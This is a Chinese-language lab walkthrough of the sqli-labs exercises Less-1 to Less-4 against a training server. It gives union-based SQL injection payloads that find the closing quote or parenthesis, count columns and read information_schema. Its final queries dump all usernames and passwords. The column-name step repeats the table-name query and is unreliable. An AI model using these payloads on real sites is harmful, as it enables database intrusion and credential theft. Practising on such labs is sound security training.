实验环境
http://43.247.91.228:84
Less-1
首先尝试一下
?id=1‘
报错
这里提醒了该数据库是Mysql
可能是后面的‘没有闭合
输入
?id=1‘--
返回正常
然后用order by 去猜列数
猜3时返回正常
猜4时报错,说明列数是3
常规步骤 爆库->爆表->爆列
现在可以用union select 去回显某一列的内容
http://43.247.91.228:84/Less-1/?id=1‘ union select 1,2,3--
接下来开始要用mysql里自带的information_schema表
猜表名
http://43.247.91.228:84/Less-1/?id=1‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--
猜列名
http://43.247.91.228:84/Less-1/?id=1‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--
猜对应的内容
http://43.247.91.228:84/Less-1/?id=-1‘ union select 1,2,concat_ws(‘#‘,username,password) from users limit 0,1--
爆所有用户名和密码
http://43.247.91.228:84/Less-1/?id=-1‘ union select 1,group_concat(username),group_concat(password) from users --
Less-2
尝试
?id=1‘
?id=1‘--
均报错,尝试加)报错
直接猜列数
接下来就和less-1同理
就随便查了
Less-3
输入
?id=1‘
报错,尝试
?id=1‘--
报错
猜测这压力应该是一个‘ )闭合
http://43.247.91.228:84/Less-3/?id=1‘)--
猜列数是3
http://43.247.91.228:84/Less-3/?id=1‘) union select 1,2,3--
Less-4
尝试输入?id=1‘-- 不报错
输入 ?id=1"-- 报错
猜测为 一个 " ) 闭合
验证
输入?id=1")--
显示正常
http://43.247.91.228:84/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users --